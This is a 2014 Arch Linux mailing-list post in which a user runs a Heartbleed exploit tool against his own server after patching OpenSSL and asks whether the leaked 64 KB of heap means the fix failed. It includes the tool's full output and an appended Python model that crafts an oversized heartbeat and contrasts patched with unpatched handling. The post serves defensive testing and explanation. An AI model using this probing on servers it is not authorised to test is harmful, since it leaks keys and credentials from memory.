[arch-general] Does openssl 1.0.1.g-1 close the heartbleed exploit?
David C. Rankin
drankinatty at suddenlinkmail.com
Fri Apr 25 03:41:07 EDT 2014
Guys,
I was testing my boxes after updating to openssl 1.0.1.g-1 with heartbleed.c
and I am still able to grab and decrypt ssl packets. The openssl security note
says 1.0.1.g is not affected by the bug, but I can still get a 64k chunk of data
back from my server using the heartbleed.c test (if I'm reading the output
correctly). Am I maybe doing something wrong? It is worth asking to be sure.
Archlinux server: phoinix - openssl 1.0.1.g-1
from client machine:
$ ./heartbleed386 -s 192.168.7.16 -p 443 -f outph -t 1
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ connecting to 192.168.7.16 443/tcp
[ connected to 192.168.7.16 443/tcp
[ <3 <3 <3 heart bleed <3 <3 <3
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ heartbleed leaked length=65535
[ final record type=24, length=16384
[ wrote 16381 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=42
[ decrypting SSL packet
[ final record type=24, length=18
[ wrote 18 bytes of heap to file 'outph'
[ done.
$ ls -al outph
-rwx------ 1 david david 65554 Apr 25 01:43 outph
$ hexdump -C outph
<snip - a lot more, with CN and other cert info visible>
Can anyone confirm the openssl 1.0.1.g-1 fix against their arch server? The
information I get back in response to heartbleed has been decrypted -- that
leads me to believe the current openssl 1.0.1.g-1 may be suspect as well. Or am
I looking at this wrong?
The ./heartbleed output that concerns me is:
[ heartbleed leaked length=65535
However, each of the subsequent calls by ./heartbleed returned only ~16408,
which if I understand correctly is the max that should be returned after the fix:
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
Is this the expected fixed behavior, or does this still reflect a
vulnerability present? What say the experts? Thanks.
--
David C. Rankin, J.D.,P.E.
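As an added illustration (not code from the original post or from OpenSSL), the following Python models the RFC 6520 heartbeat handling that CVE-2014-0160 concerns: the unpatched path trusts the 16-bit payload length from the peer and reads past the record, while the 1.0.1g path discards any request whose declared length does not fit the record. The heartbeat message and the "adjacent heap" bytes are constructed sample data.

```python
import struct
from typing import Optional

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING_LEN = 16  # RFC 6520 requires at least 16 bytes of padding after the payload


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Heartbeat message as carried inside a TLS record of content type 24.
    claimed_len lets a test declare more payload than is actually present."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING_LEN


def over_read(record: bytes) -> int:
    """Bytes an unpatched server would read beyond the end of this record."""
    if len(record) < 3:
        return 0
    _, payload_len = struct.unpack("!BH", record[:3])
    return max(0, 3 + payload_len - len(record))


def process_heartbeat(record: bytes, adjacent_heap: bytes, patched: bool) -> Optional[bytes]:
    """Return the heartbeat response, or None when the request is discarded.
    adjacent_heap stands in for whatever happened to follow the record in
    process memory (constructed for this example)."""
    if len(record) < 3:
        return None
    hb_type, payload_len = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    if patched and 1 + 2 + payload_len + PADDING_LEN > len(record):
        # The fix in 1.0.1g: a declared length inconsistent with the record
        # length means the message is silently dropped, nothing is echoed.
        return None
    # Unpatched behaviour: memcpy(bp, pl, payload_len) copies whatever sits
    # after the header, up to 65535 bytes (the 16-bit length field's maximum).
    memory = record + adjacent_heap
    echoed = memory[3:3 + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * PADDING_LEN


if __name__ == "__main__":
    heap = b"SECRET-SESSION-KEY-0123456789abcdef" * 4   # constructed sample heap
    bogus = build_heartbeat(b"ping", claimed_len=40)    # 4 bytes present, 40 claimed
    print("unpatched leaks:", process_heartbeat(bogus, heap, patched=False))
    print("patched response:", process_heartbeat(bogus, heap, patched=True))
```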